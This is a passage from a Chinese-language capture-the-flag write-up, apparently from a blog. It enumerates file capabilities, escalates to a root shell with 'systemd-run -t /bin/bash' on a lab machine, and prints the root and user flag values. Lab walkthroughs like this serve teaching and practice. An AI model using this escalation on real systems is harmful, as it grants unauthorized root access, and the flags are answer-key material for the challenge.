morris@sirrom:~$ /sbin/getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/ping = cap_net_raw+ep

使用systemd-run -t 提权

norris@sirrom:/$ systemd-run -t /bin/bash
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
Authentication is required to manage system services or other units.
Authenticating as: norris,,, (norris)
Password: 
==== AUTHENTICATION COMPLETE ===
Running as unit: run-u156.service
Press ^] three times within 1s to disconnect TTY.
root@sirrom:/# whoami
root
root@sirrom:/# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:68:65:c7 brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.6/24 brd 192.168.54.255 scope global dynamic noprefixroute ens33
       valid_lft 1536sec preferred_lft 1536sec
    inet6 fe80::20c:29ff:fe68:65c7/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

获取flag

root@sirrom:/# cat /root/root.txt
8fc9376d961670ca10be270d52eda423


root@sirrom:/# cat /home/norris/user.txt
2c2836a138c0e7f7529aa0764a6414d0
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值